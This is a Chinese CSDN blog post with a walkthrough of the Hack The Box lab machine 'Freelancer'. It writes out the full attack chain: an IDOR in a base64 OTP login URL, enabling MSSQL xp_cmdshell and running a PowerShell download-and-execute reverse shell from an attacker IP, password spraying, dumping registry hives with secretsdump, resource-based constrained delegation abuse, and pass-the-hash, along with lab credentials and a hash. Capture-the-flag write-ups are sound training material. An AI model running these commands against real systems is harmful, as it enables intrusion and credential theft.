htb_Freelancer

最新推荐文章于 2024-07-11 13:57:12 发布
最新推荐文章于 2024-07-11 13:57:12 发布
阅读量937 收藏 21
点赞数 33
分类专栏: hack the box 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62621015/article/details/139711144
版权

在这里插入图片描述
端口扫描

80 88 389 445
在这里插入图片描述
扫描ldap协议相关漏洞,没有发现
在这里插入图片描述
扫描子域名,加入/etc/hosts(后面发现没用)
在这里插入图片描述
枚举域用户
在这里插入图片描述
目录扫描,发现一个/admin目录
在这里插入图片描述
访问后发现要账号密码
在这里插入图片描述
访问80端口,注册一个freelancer用户

查看Blog,底部评论区可看见有用户

在这里插入图片描述
点击用户查看,发现修改url中的数字可以查看不同用户

在这里插入图片描述

当url为http://freelancer.htb/accounts/profile/visit/2/时,为admin用户的个人信息
在这里插入图片描述

到处看都没其他发现,回头注册一个employer account
在这里插入图片描述

找一下哪里可以激活账户
重新进行目录扫描,这次直接扫描/accounts目录,发现一个/accounts/recovery/目录
在这里插入图片描述

输入注册时填的信息,提交后就可以通过认证了
在这里插入图片描述

功能和Freelancer用户大差不差
在这里插入图片描述

看个人信息配置,发现一个二维码,提示扫码后可以直接登录账户
在这里插入图片描述

扫一下,扫出来一个url
url后面那截很耐人寻味,MTAwMTA=,=结尾看上去就像base64
在这里插入图片描述

果不其然,解码后发现是一个用户编号
在这里插入图片描述

想起来刚刚看见admin用户的编号是2,将2进行base64编码,修改url信息
在这里插入图片描述
后面是随机序列,只有五分钟有效期

http://freelancer.htb/accounts/login/otp/Mg==/xxxxxxxxxxxxxxxxxxxxxxxx/

访问url,成功切换到admin用户,这里存在IDOR越权漏洞

在这里插入图片描述

重新访问刚刚需要密码登录的/admin/目录,直接就进来了

在这里插入图片描述

底下有个sql terminal,可以执行sql命令在这里插入图片描述

尝试使用xp_cmdshell,权限拒绝
在这里插入图片描述

查看数据库所有者,sqlServer一般是sa

SELECT suser_sname(owner_sid) FROM sys.databases

,

查看数据库用户,现在的用户大概是guest或者最底下那个Freelancer_webapp_user

EXECUTE AS LOGIN = 'sa'
SELECT name FROM sys.database_principals WHERE type_desc IN ('SQL_USER', 'WINDOWS_USER', 'WINDOWS_GROUP');

在这里插入图片描述

查看sa是否为数据库管理员(有执行命令权限)

EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin');

在这里插入图片描述

使用sa权限为Freelancer_webapp_user用户授予sysadmin权限

EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user','sysadmin';

查看当前用户是否为sysadmin权限

SELECT IS_SRVROLEMEMBER('sysadmin');

在这里插入图片描述

启用xp_cmdshell

EXEC sp_configure 'show advanced options', '1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', '1' ;
RECONFIGURE;

在这里插入图片描述

可以执行cmd命令了
反弹shell(gitHub上找了一个最新的)添加链接描述

EXECUTE xp_cmdshell ‘powershell -c iex(iwr -usebasicparsing http://10.10.14.50:8899/shel1.ps1)’
在这里插入图片描述

查看用户列表
在这里插入图片描述
C:\users\sql_sve\Downloads\SqLEXPR-2019_x64_ENU目录下发现一个configuration文件
在这里插入图片描述

IL0v3ErenY3ager
t3mp0r@ryS@PWD

将两个密码弄出来做字典

再把刚刚的用户列表也弄下来

Administrator
lkazanof
lorra199
mikasaAckerman
MSSQLSERVER
sqlbackupoperator
sql_svc

使用crackmapexec进行密码喷洒

crackmapexec smb 10.10.11.5 -u user.txt -p pass.txt --sam

在这里插入图片描述
mikasaAckerman/IL0v3ErenY3ager

上传RunasCs,登录

curl http://10.10.14.50:8899/RunasCs.exe -o RunasCs.exe

在这里插入图片描述

./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r 10.10.14.50:2222

成功切换到mikasaAckerman用户

在这里插入图片描述

找user.txt的时候发现目录底下有两个特殊文件
在这里插入图片描述
mail.txt中重点是给了一个dump文件,大概就是目录里的MEMORY.7z
在这里插入图片描述
目标机器上有python,直接开启一个http服务,将MEMORY.7z下载到本地
在这里插入图片描述
下载速度有点小慢

在这里插入图片描述

解压后是一个dmp文件

在这里插入图片描述

使用memprocfs将dmp中虚拟文件系统挂载到本机的物理内存,可以查看文件目录

./memprocfs -device MEMORY.DMP -mount /mnt

在这里插入图片描述
该目录底下是windows注册表配置单元,使用secretsdump可以从注册表中提取密码

system,security,sam几个文件搂下来

在这里插入图片描述
改一下名字

mv 0xffffd3067d935000-SAM-MACHINE_SAM.reghive sam

mv 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive system

mv 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive security

使用secretsdump解密密码
在这里插入图片描述

impacket-secretsdump -sam sam -system system -security security local

在这里插入图片描述

PWN3D#l0rr@Armessa199

继续进行喷洒

crackmapexec smb 10.10.11.5 -u user.txt -P PWN3D#l0rr@Armessa199

得到新用户凭据

lorra199:PWN3D#l0rr@Armessa199

机器开放了5985端口,可以远程登录

在这里插入图片描述

evil-winrm -i 10.10.11.5 -u "lorra199" -p "PWN3D#l0rr@Armessa199"

在这里插入图片描述
同步时间

ntpdate -q freelancer.htb

在这里插入图片描述

使用bloodhound探测域内环境

faketime -f +5h bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -ns 10.10.11.5

在这里插入图片描述
发现lorra199用户位于AD RECYCLE BIN组内,该组对dc有GenericWrite权限

同时lorra199用户可以添加机器用户,可以通过修改dc的msDS-AllowedToActOnBehalfOfOtherIdentity属性进行基于资源的约束性委派攻击
在这里插入图片描述
添加机器用户

impacket-addcomputer -computer-name 'cccc$' -computer-pass '123456cc!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

在这里插入图片描述

使用impacket的rbcd模块进行攻击,修改DC$的msDS-AllowedToActOnBehalfOfOtherIdentity属性指向cccc$

impacket-rbcd -delegate-from 'cccc$' -delegate-to 'DC$' -dc-ip 10.10.11.5 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'

在这里插入图片描述

getST模块获取到administrator的cifs/dc.freelancer.htb的ST

faketime -f +5h impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/cccc$:'123456cc!'

在这里插入图片描述

将票据导入内存

export KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

secretsdump提取administrator密码

faketime -f +5h impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm

在这里插入图片描述

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::

使用evil-winrm登录

evil-winrm -i freelancer.htb -u administrator -H '0039318f1e8274633445bce32ad1a290'

在这里插入图片描述

川川小宝
关注
  • 33
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB Freelancer
qq_58869808的博客
06-18 240
AD域
hack the box[HTB]web题之FreeLancer
qq_39682037的博客
04-27 2955
觉得是sql注入,让我来试一下 http://docker.hackthebox.eu:30643?id=1 尝试失败,再来看下页面 这是啥,好像发现了新大陆 http://docker.hackthebox.eu:30643/portfolio.php?id=-1 union select 1,group_concat(table_name),3 from information_s...
HTB(hack the box) FreeLancer
weixin_44215027的博客
12-21 3386
HTB(hack the box) FreeLancer 这是一道30points的web题。 提示: 你能测试我的网站有多安全吗?证明我错了,拿到flag! 进入网站: 继续往下浏览: 看到了这个,难道是xss?构造后send,提示: 看来不是xss,只能继续寻找。 然后我看到了: 一个长期存在的事实是,当读者在看一个页面的布局时,他们会被可读的内容分散注意力。 会不会在源码中? 查看...
我和freelancer不得不说的故事6 --- 幸遇靠谱合作伙伴
07-05 499
我和freelancer不得不说的故事6 --- 幸遇靠谱合作伙伴 之前我早想做freelancer一直没有真正下决心的原因之一是freelancer市场有风险。 一个常会出现的风险就是收款...
htb_BoardLight
weixin_62621015的博客
05-29 660
hack the box BoardLihtgt easy
htb_Mailing
weixin_62621015的博客
06-06 476
hack the box Windows
htb_Editorial
weixin_62621015的博客
06-19 849
hack the box linux
htb_PermX
weixin_62621015的博客
07-11 299
hack the box linux
htb_Blurry
weixin_62621015的博客
06-13 817
hack the box linux
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
PyPI 官网下载 | htb_cli-0.1.1-py3-none-any.whl
01-05
资源来自pypi官网。 资源全名:htb_cli-0.1.1-py3-none-any.whl
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java毕设&课设-图书管理系统(完整的).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
奇异谱分析SSA做信号分解,信号去噪、分解
最新发布
07-21
奇异谱分析SSA做信号分解,信号去噪、分解 1.运行main文件,其余为子函数 2.可以做回归预测,分类预测,时间序列预测 3.可以做信号分解,算法优化,区间预测 4.可以做组合模型预测 5.可以做聚类
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值